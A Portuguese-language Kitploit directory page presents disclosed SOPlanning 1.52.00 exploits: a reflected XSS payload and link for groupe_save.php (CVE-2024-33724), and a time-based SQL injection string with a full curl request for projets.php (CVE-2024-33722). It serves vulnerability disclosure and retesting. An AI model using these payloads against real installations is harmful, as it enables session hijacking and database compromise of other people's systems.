Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
soplanning-1.52-exploits — SOPlanning 1.52.00 CSRF/SQLi/XSS (CVE-2024-33722, CVE-2024-33724) | Kitploit
Ferramentas/GitHubGitHub/fuzzlove/soplanning-1.52-exploits
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubfuzzlove/soplanning-1.52-exploits

soplanning-1.52-exploits

SOPlanning 1.52.00 CSRF/SQLi/XSS (CVE-2024-33722, CVE-2024-33724)

Ver Repositório
há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Site

Título do Exploit: SOPlanning v1.52.00 'groupe_save.php' XSS (XSS Refletido)

Aplicação: SOPlanning

Versão: 1.52.00

Data: 4/22/24

Autor do Exploit: Joseph McPeters (Liquidsky)

Homepage do Fornecedor: https://www.soplanning.org/en/

Link do Software: https://sourceforge.net/projects/soplanning/

Testado em: Linux

CVE: CVE-2024-33724

Exploit: https://github.com/fuzzlove/soplanning-1.52-exploits/blob/main/soplanning-XSS-README.txt

Descrição: SOPlanning v1.52.00 é vulnerável a XSS através dos parâmetros 'groupe_id'; um atacante remoto não autenticado pode sequestrar a conta do administrador ou de outros usuários. O atacante remoto pode sequestrar a sessão ou as credenciais de um usuário e assumir o controle de toda a plataforma.

Exemplo de Payload: "><!--

Link de XSS Refletido: /soplanning/www/process/groupe_save.php?saved=1&groupe_id="><!--&nom=Project+New

Análise: A página de destino leva em consideração o parâmetro de entrada do usuário e então redireciona para uma página onde o XSS é exibido; o payload incluído no exploit escapa da variável onde está armazenado e comenta o restante para realizar um ataque de XSS refletido válido contra qualquer usuário autenticado, incluindo o administrador.


Título do Exploit: SOPlanning v1.52.00 'projets.php' SQLi

Aplicação: SOPlanning

Versão: 1.52.00

Data: 4/22/24

Autor do Exploit: Joseph McPeters (Liquidsky aka fuzzlove)

Homepage do Fornecedor: https://www.soplanning.org/en/

Link do Software: https://sourceforge.net/projects/soplanning/

Testado em: Linux

CVE: CVE-2024-33722

Exploit: https://github.com/fuzzlove/soplanning-1.52-exploits/blob/main/soplanning-sqli-README.txt

Descrição: SOPlanning v1.52.00 é vulnerável a Injeção de SQL Autenticada através da página 'projects.php'.

Instruções: Autentique-se no host; as credenciais podem ser obtidas usando um exploit de CSRF (mais informações incluídas). Uma vez obtidas credenciais válidas, use uma requisição GET/POST para enviar os parâmetros válidos que resultam em SQLi válido.

Parâmetros de requisição vulneráveis para a requisição a "/www/projets.php":

filtreGroupeProjet=1&statut[]=todo'+AND+(SELECT+8073+FROM+(SELECT(SLEEP(10)))PuxA)+AND+'Liquidsky'='Liquidsky&rechercheProjet=test

Os parâmetros acima podem ser enviados como uma requisição GET/POST válida para acionar o SQLi. Exemplo de Requisição Curl Para Re-Testar o SQLi:

curl -i -s -k -X $'POST'
-H $'Host: 127.0.0.1' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 130' -H $'Origin: http://127.0.0.1' -H $'Connection: close' -H $'Referer: http://127.0.0.1/soplanning/www/projets.php' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-User: ?1'
-b $'dateDebut=23/04/2024; dateFin=23/06/2024; xposMoisWin=0; xposJoursWin=0; yposMoisWin=0; yposJoursWin=0; yposProjets=33; PHPSESSID=ovpbclvbc87uh7anfbq2luf9bi; soplanningplanning_=hhrtf0rgs562vm8rhn5i641481; baseLigne=users; baseColonne=jours; afficherTableauRecap=1; masquerLigneVide=0; statut_projet=%5B%22abort%22%2C%22archive%22%2C%22done%22%2C%22progress%22%2C%22todo%22%5D'
--data-binary $'filtreGroupeProjet=1&statut[]=todo'+AND+(SELECT+8073+FROM+(SELECT(SLEEP(10)))PuxA)+AND+'Liquidsky'='Liquidsky&rechercheProjet=test'
$'http://127.0.0.1/soplanning/www/projets.php'

Nota: Os cookies precisam estar autenticados e a requisição precisa ser válida para que o SQLi seja válido. Esta requisição curl pode ser usada com um proxy para reconstruir uma requisição válida.

Baixar ferramenta